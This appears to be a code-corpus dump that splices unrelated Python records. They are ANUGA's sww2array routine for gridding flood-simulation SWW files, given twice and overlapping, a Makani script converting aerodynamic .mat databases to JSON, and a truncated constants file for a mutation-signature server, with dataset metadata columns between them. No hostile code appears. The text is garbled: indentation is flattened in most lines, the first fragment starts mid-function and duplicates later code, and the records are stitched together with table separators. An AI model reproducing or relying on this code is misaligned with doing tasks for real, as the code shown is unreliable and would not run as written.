# check if variable has time axis
if len(fid.variables[name].shape) == 2:
q_dict[name] = fid.variables[name][:,start_slice:end_slice]
else: # no time axis
q_dict[name] = fid.variables[name][start_slice:end_slice]
# Evaluate expression with quantities found in SWW file
res = apply_expression_to_dictionary(quantity, q_dict)
if len(res.shape) == 2:
new_res = num.zeros(res.shape[1], num.float)
for k in range(res.shape[1]):
if type(reduction) is not types.BuiltinFunctionType:
new_res[k] = res[reduction,k]
else:
new_res[k] = reduction(res[:,k])
res = new_res
result[start_slice:end_slice] = res
# Post condition: Now q has dimension: number_of_points
assert len(result.shape) == 1
assert result.shape[0] == number_of_points
if verbose:
log.critical('Processed values for %s are in [%f, %f]'
% (quantity, min(result), max(result)))
# Create grid and update xll/yll corner and x,y
# Relative extent
if easting_min is None:
xmin = min(x)
else:
xmin = easting_min - xllcorner
if easting_max is None:
xmax = max(x)
else:
xmax = easting_max - xllcorner
if northing_min is None:
ymin = min(y)
else:
ymin = northing_min - yllcorner
if northing_max is None:
ymax = max(y)
else:
ymax = northing_max - yllcorner
msg = 'xmax must be greater than or equal to xmin.\n'
msg += 'I got xmin = %f, xmax = %f' %(xmin, xmax)
assert xmax >= xmin, msg
    msg = 'ymax must be greater than or equal to ymin.\n'
msg += 'I got ymin = %f, ymax = %f' %(ymin, ymax)
assert ymax >= ymin, msg
if verbose: log.critical('Creating grid')
ncols = int(old_div((xmax-xmin),cellsize)) + 1
nrows = int(old_div((ymax-ymin),cellsize)) + 1
# New absolute reference and coordinates
newxllcorner = xmin + xllcorner
newyllcorner = ymin + yllcorner
x = x + xllcorner - newxllcorner
y = y + yllcorner - newyllcorner
grid_values = num.zeros( (nrows*ncols, ), num.float)
#print '---',grid_values.shape
num_tri = len(volumes)
norms = num.zeros(6*num_tri, num.float)
    # Use the fast C extension (calc_grid_values_ext) to calculate grid values
from .calc_grid_values_ext import calc_grid_values
calc_grid_values(nrows, ncols, cellsize, NODATA_value,
x,y, norms, volumes, result, grid_values)
fid.close()
#print outside_indices
if verbose:
log.critical('Interpolated values are in [%f, %f]'
% (num.min(grid_values), num.max(grid_values)))
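    # Reshape the flat grid values to (nrows, ncols) and reverse the row
    # order (the [::-1, :] slice below) before returning.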
return x,y, grid_values.reshape(nrows,ncols)[::-1,:]
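# ----------------------------------------------------------------------
# Example usage: a minimal sketch, not part of the original ANUGA API.
# The file name 'runup.sww' is a hypothetical placeholder - point it at
# any existing sww file. The call rasterises the maximum water depth
# ('stage-elevation') onto a 5 m grid and reports the shape and maximum
# of the resulting array.
# ----------------------------------------------------------------------
if __name__ == '__main__':
    example_sww = 'runup.sww'  # hypothetical input file name
    if os.path.exists(example_sww):
        x, y, depth = sww2array(example_sww,
                                quantity='depth',  # expands to 'stage-elevation'
                                reduction=max,     # maximum over all timesteps
                                cellsize=5,
                                verbose=True)
        print('Grid shape (nrows, ncols):', depth.shape)
        # Cells outside the mesh hold NODATA_value (-9999.0 by default)
        print('Maximum gridded depth:', depth.max())
    else:
        print('Example skipped: %s not found' % example_sww)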
| """
Module to convert SWW to DEM files.
"""
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
# external modules
from builtins import str
from builtins import range
from past.utils import old_div
from future.utils import raise_
import os
import numpy as num
# ANUGA modules
from anuga.abstract_2d_finite_volumes.util import remove_lone_verts
from anuga.coordinate_transforms.geo_reference import Geo_reference
from anuga.utilities.system_tools import get_vars_in_expression
import anuga.utilities.log as log
from anuga.utilities.file_utils import get_all_swwfiles
######
# formula mappings
######
quantity_formula = {'momentum':'(xmomentum**2 + ymomentum**2)**0.5',
'depth':'stage-elevation',
'speed': \
'(xmomentum**2 + ymomentum**2)**0.5/(stage-elevation+1.e-6/(stage-elevation))'}
# Default block size for sww2dem()
DEFAULT_BLOCK_SIZE = 100000
def sww2array(name_in,
quantity=None, # defaults to elevation
reduction=None,
cellsize=10,
number_of_decimal_places=None,
NODATA_value=-9999.0,
easting_min=None,
easting_max=None,
northing_min=None,
northing_max=None,
verbose=False,
origin=None,
datum='WGS84',
block_size=None):
"""Read SWW file and convert to a numpy array (can be stored to a png file later)
The parameter quantity must be the name of an existing quantity or
an expression involving existing quantities. The default is
'elevation'. Quantity is not a list of quantities.
If reduction is given and it's an index, sww2array will output the quantity at that time-step.
If reduction is given and it's a built in function (eg max, min, mean), then that
function is used to reduce the quantity over all time-steps. If reduction is not given,
reduction is set to "max" by default.
datum
block_size - sets the number of slices along the non-time axis to
process in one block.
"""
import sys
import types
from anuga.geometry.polygon import inside_polygon, outside_polygon
from anuga.abstract_2d_finite_volumes.util import \
apply_expression_to_dictionary
basename_in, in_ext = os.path.splitext(name_in)
if in_ext != '.sww':
raise IOError('Input format for %s must be .sww' % name_in)
false_easting = 500000
false_northing = 10000000
if quantity is None:
quantity = 'elevation'
if reduction is None:
reduction = max
if quantity in quantity_formula:
quantity = quantity_formula[quantity]
if number_of_decimal_places is None:
number_of_decimal_places = 3
if block_size is None:
block_size = DEFAULT_BLOCK_SIZE
    assert(isinstance(block_size, (int, float)))
# Read sww file
if verbose:
log.critical('Reading from %s' % name_in)
from anuga.file.netcdf import NetCDFFile
fid = NetCDFFile(name_in)
#Get extent and reference
x = num.array(fid.variables['x'], num.float)
y = num.array(fid.variables['y'], num.float)
volumes = num.array(fid.variables['volumes'], num.int)
if type(reduction) is not types.BuiltinFunctionType:
times = fid.variables['time'][reduction]
else:
times = fid.variables['time'][:]
number_of_timesteps = fid.dimensions['number_of_timesteps']
number_of_points = fid.dimensions['number_of_points']
if origin is None:
# Get geo_reference
# sww files don't have to have a geo_ref
try:
geo_reference = Geo_reference(NetCDFObject=fid)
except AttributeError as e:
geo_reference = Geo_reference() # Default georef object
xllcorner = geo_reference.get_xllcorner()
yllcorner = geo_reference.get_yllcorner()
zone = geo_reference.get_zone()
else:
zone = origin[0]
xllcorner = origin[1]
yllcorner = origin[2]
# FIXME: Refactor using code from Interpolation_function.statistics
# (in interpolate.py)
# Something like print swwstats(swwname)
if verbose:
log.critical('------------------------------------------------')
log.critical('Statistics of SWW file:')
log.critical(' Name: %s' % name_in)
log.critical(' Reference:')
log.critical(' Lower left corner: [%f, %f]' % (xllcorner, yllcorner))
if type(reduction) is not types.BuiltinFunctionType:
log.critical(' Time: %f' % times)
else:
log.critical(' Start time: %f' % fid.starttime[0])
log.critical(' Extent:')
log.critical(' x [m] in [%f, %f], len(x) == %d'
%(num.min(x), num.max(x), len(x.flat)))
log.critical(' y [m] in [%f, %f], len(y) == %d'
% (num.min(y), num.max(y), len(y.flat)))
if type(reduction) is not types.BuiltinFunctionType:
log.critical(' t [s] = %f, len(t) == %d' % (times, 1))
else:
log.critical(' t [s] in [%f, %f], len(t) == %d'
% (min(times), max(times), len(times)))
log.critical(' Quantities [SI units]:')
# Comment out for reduced memory consumption
for name in ['stage', 'xmomentum', 'ymomentum']:
q = fid.variables[name][:].flatten()
if type(reduction) is not types.BuiltinFunctionType:
q = q[reduction*len(x):(reduction+1)*len(x)]
if verbose: log.critical(' %s in [%f, %f]'
% (name, min(q), max(q)))
for name in ['elevation']:
q = fid.variables[name][:].flatten()
if verbose: log.critical(' %s in [%f, %f]'
% (name, min(q), max(q)))
# Get the variables in the supplied expression.
# This may throw a SyntaxError exception.
var_list = get_vars_in_expression(quantity)
# Check that we have the required variables in the SWW file.
missing_vars = []
for name in var_list:
try:
_ = fid.variables[name]
except KeyError:
missing_vars.append(name)
if missing_vars:
msg = ("In expression '%s', variables %s are not in the SWW file '%s'"
% (quantity, str(missing_vars), name_in))
raise_(Exception, msg)
# Create result array and start filling, block by block.
result = num.zeros(number_of_points, num.float)
if verbose:
msg = 'Slicing sww file, num points: ' + str(number_of_points)
msg += ', block size: ' + str(block_size)
log.critical(msg)
for start_slice in range(0, number_of_points, block_size):
# Limit slice size to array end if at last block
end_slice = min(start_slice + block_size, number_of_points)
# Get slices of all required variables
if type(reduction) is not types.BuiltinFunctionType:
q_dict = {}
for name in var_list:
# check if variable has time axis
if len(fid.variables[name].shape) == 2:
print('avoiding large array')
q_dict[name] = fid.variables[name][reduction,start_slice:end_slice]
else: # no time axis
q_dict[name] = fid.variables[name][start_slice:end_slice]
# Evaluate expression with quantities found in SWW file
res = apply_expression_to_dictionary(quantity, q_dict)
# if len(res.shape) == 2:
# new_res = num.zeros(res.shape[1], num.float)
# for k in xrange(res.shape[1]):
# if type(reduction) is not types.BuiltinFunctionType:
# new_res[k] = res[k]
# else:
# new_res[k] = reduction(res[:,k])
# res = new_res
else:
q_dict = {}
for name in var_list:
# check if variable has time axis
if len(fid.variables[name].shape) == 2:
q_dict[name] = fid.variables[name][:,start_slice:end_slice]
else: # no time axis
q_dict[name] = fid.variables[name][start_slice:end_slice]
# Evaluate expression with quantities found in SWW file
res = apply_expression_to_dictionary(quantity, q_dict)
if len(res.shape) == 2:
new_res = num.zeros(res.shape[1], num.float)
for k in range(res.shape[1]):
if type(reduction) is not types.BuiltinFunctionType:
new_res[k] = res[reduction,k]
else:
new_res[k] = reduction(res[:,k])
res = new_res
result[start_slice:end_slice] = res
    # Post condition: result now has dimension number_of_points
assert len(result.shape) == 1
assert result.shape[0] == number_of_points
if verbose:
log.critical('Processed values for %s are in [%f, %f]'
% (quantity, min(result), max(result)))
# Create grid and update xll/yll corner and x,y
# Relative extent
if easting_min is None:
xmin = min(x)
else:
xmin = easting_min - xllcorner
if easting_max is None:
xmax = max(x)
else:
xmax = easting_max - xllcorner
if northing_min is None:
ymin = min(y)
else:
ymin = northing_min - yllcorner
if northing_max is None:
ymax = max(y)
else:
ymax = northing_max - yllcorner
msg = 'xmax must be greater than or equal to xmin.\n'
msg += 'I got xmin = %f, xmax = %f' %(xmin, xmax)
assert xmax >= xmin, msg
    msg = 'ymax must be greater than or equal to ymin.\n'
msg += 'I got ymin = %f, ymax = %f' %(ymin, ymax)
assert ymax >= ymin, msg
if verbose: log.critical('Creating grid')
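    # +1 so the grid spans the full extent, including both edge coordinates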
ncols = int(old_div((xmax-xmin),cellsize)) + 1
nrows = int(old_div((ymax-ymin),cellsize)) + 1
# New absolute reference and coordinates
newxllcorner = xmin + xllcorner
newyllcorner = ymin + yllcorner
x = x + xllcorner - newxllcorner
y = y + yllcorner - newyllcorner
grid_values = num.zeros( (nrows*ncols, ), num.float)
#print '---',grid_values.shape
num_tri = len(volumes)
norms = num.zeros(6*num_tri, num.float)
    # Use fast method to calc grid values
from .calc_grid_values_ext import calc_grid_values
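    # Rasterise the triangle-based result onto the regular grid (cells outside
    # the mesh are expected to receive NODATA_value).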
calc_grid_values(nrows, ncols, cellsize, NODATA_value,
x,y, norms, volumes, result, grid_values)
fid.close()
#print outside_indices
if verbose:
log.critical('Interpolated values are in [%f, %f]'
% (num.min(grid_values), num.max(grid_values)))
return x,y, grid_values.reshape(nrows,ncols)[::-1,:] | en | 0.743315 | Module to convert SWW to DEM files. # external modules # ANUGA modules ###### # formula mappings ###### # Default block size for sww2dem() # defaults to elevation Read SWW file and convert to a numpy array (can be stored to a png file later) The parameter quantity must be the name of an existing quantity or an expression involving existing quantities. The default is 'elevation'. Quantity is not a list of quantities. If reduction is given and it's an index, sww2array will output the quantity at that time-step. If reduction is given and it's a built in function (eg max, min, mean), then that function is used to reduce the quantity over all time-steps. If reduction is not given, reduction is set to "max" by default. datum block_size - sets the number of slices along the non-time axis to process in one block. # Read sww file #Get extent and reference # Get geo_reference # sww files don't have to have a geo_ref # Default georef object # FIXME: Refactor using code from Interpolation_function.statistics # (in interpolate.py) # Something like print swwstats(swwname) # Comment out for reduced memory consumption # Get the variables in the supplied expression. # This may throw a SyntaxError exception. # Check that we have the required variables in the SWW file. # Create result array and start filling, block by block. # Limit slice size to array end if at last block # Get slices of all required variables # check if variable has time axis # no time axis # Evaluate expression with quantities found in SWW file # if len(res.shape) == 2: # new_res = num.zeros(res.shape[1], num.float) # for k in xrange(res.shape[1]): # if type(reduction) is not types.BuiltinFunctionType: # new_res[k] = res[k] # else: # new_res[k] = reduction(res[:,k]) # res = new_res # check if variable has time axis # no time axis # Evaluate expression with quantities found in SWW file # Post condition: Now q has dimension: number_of_points # Create grid and update xll/yll corner and x,y # Relative extent # New absolute reference and coordinates #print '---',grid_values.shape #Use fasr method to calc grid values #print outside_indices | 2.390723 | 2 |
analysis/aero/avl_mat_to_json.py | leozz37/makani | 1,178 | 6632465 | #!/usr/bin/python
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Conversion utility for transforming .mat aerodynamics databases to .json."""
import collections
import json
import sys
import gflags
from makani.control import system_types
from makani.lib.python import dict_util
import numpy
from scipy import io
FLAGS = gflags.FLAGS
gflags.DEFINE_string('input_file', None, 'MATLAB .mat file to read in.')
gflags.DEFINE_string('output_file', None, 'JSON file to write to.')
def _ConvertMatlabStructure(data):
"""Convert a database loaded from a .mat file to be written to a JSON file."""
if not hasattr(data, 'dtype'):
raise ValueError('Argument must be an numpy array.')
if hasattr(data.dtype, 'fields') and data.dtype.fields:
result = {}
for key in data.dtype.fields.keys():
result[key] = _ConvertMatlabStructure(data[key])
return result
elif data.dtype == numpy.dtype('O'):
if data.size != 1:
raise ValueError('Structures must be scalar.')
return _ConvertMatlabStructure(data[0])
elif data.shape and data.shape[-1] == 1:
return _ConvertMatlabStructure(data[..., 0])
else:
return data.tolist()
def main(argv):
try:
argv = FLAGS(argv)
except gflags.FlagsError, e:
print '%s\\nUsage: %s ARGS\\n%s' % (e, sys.argv[0], FLAGS)
sys.exit(1)
data = io.loadmat(FLAGS.input_file)['database']
# Parameters and grid defintiion.
keys = [
'reynolds_number',
'num_alphas', 'num_betas', 'num_deltas',
'alphads', 'betads', 'deltads',
'flap_list', 'omega_hat', 'Sref',
'Cref', 'Bref', 'mach_number'
]
# Arrays of data that are of shape (num_deltas, num_alphas, num_betas)
# in shape.
coefficients = [
'CLtot', 'CDtot', 'de1',
'CXtot', 'CYtot', 'CZtot',
'Cltot', 'Cmtot', 'Cntot',
'CXp', 'CXq', 'CXr',
'Clp', 'Clq', 'Clr',
'CYp', 'CYq', 'CYr',
'Cmp', 'Cmq', 'Cmr',
'CZp', 'CZq', 'CZr',
'Cnp', 'Cnq', 'Cnr',
'CXd1', 'CYd1', 'CZd1',
'Cld1', 'Cmd1', 'Cnd1',
'CXd2', 'CYd2', 'CZd2',
'Cld2', 'Cmd2', 'Cnd2',
'CXd3', 'CYd3', 'CZd3',
'Cld3', 'Cmd3', 'Cnd3',
'CXd4', 'CYd4', 'CZd4',
'Cld4', 'Cmd4', 'Cnd4',
'CXd5', 'CYd5', 'CZd5',
'Cld5', 'Cmd5', 'Cnd5',
'CXd6', 'CYd6', 'CZd6',
'Cld6', 'Cmd6', 'Cnd6',
'CXd7', 'CYd7', 'CZd7',
'Cld7', 'Cmd7', 'Cnd7',
'CXd8', 'CYd8', 'CZd8',
'Cld8', 'Cmd8', 'Cnd8'
]
output_dict = _ConvertMatlabStructure(data)
output_dict = collections.OrderedDict(
[(key, output_dict[key]) for key in keys]
+ [(key, output_dict[key]) for key in coefficients]
+ [('params', dict_util.OrderDict(output_dict['params']))]
)
# Force shapes to be correct.
output_dict['alphads'] = numpy.reshape(output_dict['alphads'],
(output_dict['num_alphas'],)).tolist()
output_dict['betads'] = numpy.reshape(output_dict['betads'],
(output_dict['num_betas'],)).tolist()
output_dict['deltads'] = numpy.reshape(output_dict['deltads'],
(output_dict['num_deltas'],)).tolist()
output_dict['flap_list'] = numpy.reshape(
output_dict['flap_list'], (system_types.kNumFlaps,)).tolist()
output_dict['omega_hat'] = numpy.reshape(
output_dict['omega_hat'], (3,)).tolist()
for coeff in coefficients:
output_dict[coeff] = numpy.reshape(
output_dict[coeff],
(output_dict['num_deltas'], output_dict['num_alphas'],
output_dict['num_betas'])).tolist()
output_string = json.dumps(output_dict, separators=(', ', ':\n '))
output_string = (output_string
.replace(', \"', ',\n\"')
.replace('], [', '],\n [')
.replace(' [[', '[[')
.replace('{', '{\n')
.replace('}', '\n}')) + '\n'
with open(FLAGS.output_file, 'w') as f:
f.write(output_string)
if __name__ == '__main__':
gflags.MarkFlagAsRequired('input_file')
gflags.MarkFlagAsRequired('output_file')
main(sys.argv)
| #!/usr/bin/python
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Conversion utility for transforming .mat aerodynamics databases to .json."""
import collections
import json
import sys
import gflags
from makani.control import system_types
from makani.lib.python import dict_util
import numpy
from scipy import io
FLAGS = gflags.FLAGS
gflags.DEFINE_string('input_file', None, 'MATLAB .mat file to read in.')
gflags.DEFINE_string('output_file', None, 'JSON file to write to.')
def _ConvertMatlabStructure(data):
"""Convert a database loaded from a .mat file to be written to a JSON file."""
if not hasattr(data, 'dtype'):
raise ValueError('Argument must be an numpy array.')
if hasattr(data.dtype, 'fields') and data.dtype.fields:
result = {}
for key in data.dtype.fields.keys():
result[key] = _ConvertMatlabStructure(data[key])
return result
elif data.dtype == numpy.dtype('O'):
if data.size != 1:
raise ValueError('Structures must be scalar.')
return _ConvertMatlabStructure(data[0])
elif data.shape and data.shape[-1] == 1:
return _ConvertMatlabStructure(data[..., 0])
else:
return data.tolist()
def main(argv):
try:
argv = FLAGS(argv)
except gflags.FlagsError, e:
print '%s\\nUsage: %s ARGS\\n%s' % (e, sys.argv[0], FLAGS)
sys.exit(1)
data = io.loadmat(FLAGS.input_file)['database']
# Parameters and grid defintiion.
keys = [
'reynolds_number',
'num_alphas', 'num_betas', 'num_deltas',
'alphads', 'betads', 'deltads',
'flap_list', 'omega_hat', 'Sref',
'Cref', 'Bref', 'mach_number'
]
# Arrays of data that are of shape (num_deltas, num_alphas, num_betas)
# in shape.
coefficients = [
'CLtot', 'CDtot', 'de1',
'CXtot', 'CYtot', 'CZtot',
'Cltot', 'Cmtot', 'Cntot',
'CXp', 'CXq', 'CXr',
'Clp', 'Clq', 'Clr',
'CYp', 'CYq', 'CYr',
'Cmp', 'Cmq', 'Cmr',
'CZp', 'CZq', 'CZr',
'Cnp', 'Cnq', 'Cnr',
'CXd1', 'CYd1', 'CZd1',
'Cld1', 'Cmd1', 'Cnd1',
'CXd2', 'CYd2', 'CZd2',
'Cld2', 'Cmd2', 'Cnd2',
'CXd3', 'CYd3', 'CZd3',
'Cld3', 'Cmd3', 'Cnd3',
'CXd4', 'CYd4', 'CZd4',
'Cld4', 'Cmd4', 'Cnd4',
'CXd5', 'CYd5', 'CZd5',
'Cld5', 'Cmd5', 'Cnd5',
'CXd6', 'CYd6', 'CZd6',
'Cld6', 'Cmd6', 'Cnd6',
'CXd7', 'CYd7', 'CZd7',
'Cld7', 'Cmd7', 'Cnd7',
'CXd8', 'CYd8', 'CZd8',
'Cld8', 'Cmd8', 'Cnd8'
]
output_dict = _ConvertMatlabStructure(data)
output_dict = collections.OrderedDict(
[(key, output_dict[key]) for key in keys]
+ [(key, output_dict[key]) for key in coefficients]
+ [('params', dict_util.OrderDict(output_dict['params']))]
)
# Force shapes to be correct.
output_dict['alphads'] = numpy.reshape(output_dict['alphads'],
(output_dict['num_alphas'],)).tolist()
output_dict['betads'] = numpy.reshape(output_dict['betads'],
(output_dict['num_betas'],)).tolist()
output_dict['deltads'] = numpy.reshape(output_dict['deltads'],
(output_dict['num_deltas'],)).tolist()
output_dict['flap_list'] = numpy.reshape(
output_dict['flap_list'], (system_types.kNumFlaps,)).tolist()
output_dict['omega_hat'] = numpy.reshape(
output_dict['omega_hat'], (3,)).tolist()
for coeff in coefficients:
output_dict[coeff] = numpy.reshape(
output_dict[coeff],
(output_dict['num_deltas'], output_dict['num_alphas'],
output_dict['num_betas'])).tolist()
output_string = json.dumps(output_dict, separators=(', ', ':\n '))
output_string = (output_string
.replace(', \"', ',\n\"')
.replace('], [', '],\n [')
.replace(' [[', '[[')
.replace('{', '{\n')
.replace('}', '\n}')) + '\n'
with open(FLAGS.output_file, 'w') as f:
f.write(output_string)
if __name__ == '__main__':
gflags.MarkFlagAsRequired('input_file')
gflags.MarkFlagAsRequired('output_file')
main(sys.argv)
| en | 0.820102 | #!/usr/bin/python # Copyright 2020 Makani Technologies LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Conversion utility for transforming .mat aerodynamics databases to .json. Convert a database loaded from a .mat file to be written to a JSON file. # Parameters and grid defintiion. # Arrays of data that are of shape (num_deltas, num_alphas, num_betas) # in shape. # Force shapes to be correct. | 2.556003 | 3 |
server/web_constants.py | lrgr/imuse-server | 0 | 6632466 | import os
import re
from enum import Enum
OBJ_DIR = '/obj'
META_DATA_FILENAME = 'meta-data.tsv'
META_SIGS_FILENAME = 'meta-sigs.tsv'
META_PATHWAYS_FILENAME = 'meta-pathways.tsv'
META_FEATURED_FILENAME = 'meta-featured.tsv'
META_CLINICAL_FILENAME = 'meta-clinical.tsv'
META_TRICOUNTS_FILENAME = 'meta-tricounts.tsv'
ONCOTREE_FILENAME = 'oncotree-2018_11_01.json'
GENES_AGG_FILENAME = 'computed-genes_agg-{letter}.tsv'
SAMPLES_AGG_FILENAME = 'computed-samples_agg.tsv'
PROJ_TO_SIGS_FILENAME = 'computed-oncotree_proj_to_sigs_per_group.tsv'
META_DATA_FILE = os.path.join(OBJ_DIR, META_DATA_FILENAME)
META_SIGS_FILE = os.path.join(OBJ_DIR, META_SIGS_FILENAME)
META_PATHWAYS_FILE = os.path.join(OBJ_DIR, META_PATHWAYS_FILENAME)
META_FEATURED_FILE = os.path.join(OBJ_DIR, META_FEATURED_FILENAME)
META_CLINICAL_FILE = os.path.join(OBJ_DIR, META_CLINICAL_FILENAME)
META_TRICOUNTS_FILE = os.path.join(OBJ_DIR, META_TRICOUNTS_FILENAME)
GENES_AGG_FILE = os.path.join(OBJ_DIR, GENES_AGG_FILENAME)
SAMPLES_AGG_FILE = os.path.join(OBJ_DIR, SAMPLES_AGG_FILENAME)
ONCOTREE_FILE = os.path.join(OBJ_DIR, ONCOTREE_FILENAME)
PROJ_TO_SIGS_FILE = os.path.join(OBJ_DIR, PROJ_TO_SIGS_FILENAME)
EXPLOSIG_CONNECT_HOST = 'explosig_connect:8200'
CAT_TYPES = [
'SBS_96',
'DBS_78',
'INDEL_Alexandrov2018_83'
]
MUT_TYPES = [
'SBS',
'DBS',
'INDEL'
]
MUT_TYPE_MAP = {
'SBS': 'SBS_96',
'DBS': 'DBS_78',
'INDEL': 'INDEL_Alexandrov2018_83'
}
CAT_TYPE_MAP = dict([(val, key) for key, val in MUT_TYPE_MAP.items()])
# Regular Expressions
CHROMOSOME_RE = r'^(X|Y|M|[1-9]|1[0-9]|2[0-2])$'
# Column names for extended mutation tables
PATIENT = 'Patient'
SAMPLE = 'Sample'
CANCER_TYPE = 'Cancer Type'
PROVENANCE = 'Provenance'
COHORT = 'Cohort'
CHR = 'Chromosome'
POS_START = 'Start Position'
POS_END = 'End Position'
REF = 'Reference Sequence'
VAR = 'Variant Sequence'
GSTRAND = 'Genomic Strand'
SEQ_TYPE = 'Sequencing Strategy'
MUT_TYPE = 'Mutation Type'
ASSEMBLY = 'Assembly Version'
MUT_CLASS = 'Mutation Classification'
GENE_SYMBOL = "Gene Symbol"
FPRIME = "5' Flanking Bases"
TPRIME = "3' Flanking Bases"
TSTRAND = 'Transcriptional Strand'
MUT_DIST = 'Distance to Previous Mutation'
NEAREST_MUT = 'Distance to Nearest Mutation'
MUT_DIST_ROLLING_MEAN = 'Rolling Mean of 6 Mutation Distances'
KATAEGIS = 'Kataegis'
# Special clinical variables
ICD_O_3_SITE_CODE = 'ICD-O-3 Site Code'
ICD_O_3_SITE_DESC = 'ICD-O-3 Site Description'
ICD_O_3_HISTOLOGY_CODE = 'ICD-O-3 Histology Code'
ICD_O_3_HISTOLOGY_DESC = 'ICD-O-3 Histology Description'
SURVIVAL_DAYS_TO_DEATH = 'Days to Death'
SURVIVAL_DAYS_TO_LAST_FOLLOWUP = 'Days to Last Followup'
# Column names for gene expression tables
GENE_EXPRESSION_RNA_SEQ_MRNA_Z = 'RNA Seq v2 mRNA median Zscore'
CHROMOSOMES = {
'1': 249250621,
'2': 243199373,
'3': 198022430,
'4': 191154276,
'5': 180915260,
'6': 171115067,
'7': 159138663,
'8': 146364022,
'9': 141213431,
'10': 135534747,
'11': 135006516,
'12': 133851895,
'13': 115169878,
'14': 107349540,
'15': 102531392,
'16': 90354753,
'17': 81195210,
'18': 78077248,
'19': 59128983,
'20': 63025520,
'21': 48129895,
'22': 51304566,
'X': 155270560,
'Y': 59373566,
'M': 16571
}
class MUT_CLASS_VALS(Enum):
SILENT = "Silent"
MISSENSE = "Missense"
FRAMESHIFT = "Frameshift"
SPLICE_SITE = "Splice Site"
NONSENSE = "Nonsense"
IN_FRAME_INDEL = "in-frame indel"
OTHER = "Other mutation"
NONSTOP = "Nonstop"
TRANSLATION_START_SITE="Translation Start Site"
# Signatures columns
META_COL_SIG = 'Signature'
META_COL_ONCOTREE_CODE = 'Oncotree Code'
META_COL_CANCER_TYPE = 'Cancer Type'
META_COL_CAT_TYPE = 'Category Type'
META_COL_DESCRIPTION = 'Description'
META_COL_INDEX = 'Index'
META_COL_SIG_GROUP = 'Signature Group'
META_COL_PUBLICATION = 'Publication'
META_COL_PATH_SIGS_META = 'Path to Meta File'
META_COL_PATH_SIGS_DATA = 'Path to Signatures {cat_type} File'
META_COL_PATH_SIGS_CANCER_TYPE_MAP = 'Path to Cancer Type Map File'
META_COL_PATH_SIGS_DATA_LIST = [META_COL_PATH_SIGS_DATA.format(cat_type=val) for val in CAT_TYPES]
META_SIGS_FILE_COLS = [
META_COL_PATH_SIGS_META,
META_COL_PATH_SIGS_CANCER_TYPE_MAP
] + META_COL_PATH_SIGS_DATA_LIST
META_SIGS_COLS = [
META_COL_SIG,
META_COL_DESCRIPTION,
META_COL_INDEX,
META_COL_CAT_TYPE
]
META_CANCER_TYPE_MAP_COLS = [
META_COL_SIG,
META_COL_ONCOTREE_CODE,
META_COL_CANCER_TYPE,
META_COL_CAT_TYPE
]
# Mutation data columns
META_COL_PROJ = 'Project'
META_COL_PROJ_SOURCE = 'Project Source'
META_COL_PROJ_NAME = 'Project Name'
META_COL_PATH_MUTS_COUNTS = 'Path to Counts {cat_type} File'
META_COL_PATH_CLINICAL = 'Path to Clinical File'
META_COL_PATH_SAMPLES = 'Path to Samples File'
META_COL_PATH_GENE_MUT = 'Path to Gene Mutation File'
META_COL_PATH_GENE_EXP = 'Path to Gene Expression File'
META_COL_PATH_GENE_CNA = 'Path to Gene CNA File'
META_COL_PATH_MUTS_COUNTS_LIST = [META_COL_PATH_MUTS_COUNTS.format(cat_type=val) for val in CAT_TYPES]
META_DATA_FILE_COLS = [
META_COL_PATH_CLINICAL,
META_COL_PATH_SAMPLES,
META_COL_PATH_GENE_MUT,
META_COL_PATH_GENE_EXP,
META_COL_PATH_GENE_CNA
] + META_COL_PATH_MUTS_COUNTS_LIST
# Pathways data columns
META_COL_PATHWAYS_GROUP = 'Pathways Group'
META_COL_PATH_PATHWAYS = 'Path to Pathways File'
META_PATHWAYS_FILE_COLS = [
META_COL_PATH_PATHWAYS
]
# Clinical variables columns
META_COL_CLINICAL_COL = 'Clinical Column'
META_COL_CLINICAL_SCALE_TYPE = 'Scale Type'
META_COL_CLINICAL_EXTENT = 'Extent'
META_COL_CLINICAL_VALUE = 'Value'
# Tri-counts data columns
META_COL_TRICOUNTS_METHOD = 'Method'
META_COL_PATH_TRICOUNTS = 'Path to Trinucleotide Counts File'
META_TRICOUNTS_FILE_COLS = [
META_COL_PATH_TRICOUNTS
] | import os
import re
from enum import Enum
OBJ_DIR = '/obj'
META_DATA_FILENAME = 'meta-data.tsv'
META_SIGS_FILENAME = 'meta-sigs.tsv'
META_PATHWAYS_FILENAME = 'meta-pathways.tsv'
META_FEATURED_FILENAME = 'meta-featured.tsv'
META_CLINICAL_FILENAME = 'meta-clinical.tsv'
META_TRICOUNTS_FILENAME = 'meta-tricounts.tsv'
ONCOTREE_FILENAME = 'oncotree-2018_11_01.json'
GENES_AGG_FILENAME = 'computed-genes_agg-{letter}.tsv'
SAMPLES_AGG_FILENAME = 'computed-samples_agg.tsv'
PROJ_TO_SIGS_FILENAME = 'computed-oncotree_proj_to_sigs_per_group.tsv'
META_DATA_FILE = os.path.join(OBJ_DIR, META_DATA_FILENAME)
META_SIGS_FILE = os.path.join(OBJ_DIR, META_SIGS_FILENAME)
META_PATHWAYS_FILE = os.path.join(OBJ_DIR, META_PATHWAYS_FILENAME)
META_FEATURED_FILE = os.path.join(OBJ_DIR, META_FEATURED_FILENAME)
META_CLINICAL_FILE = os.path.join(OBJ_DIR, META_CLINICAL_FILENAME)
META_TRICOUNTS_FILE = os.path.join(OBJ_DIR, META_TRICOUNTS_FILENAME)
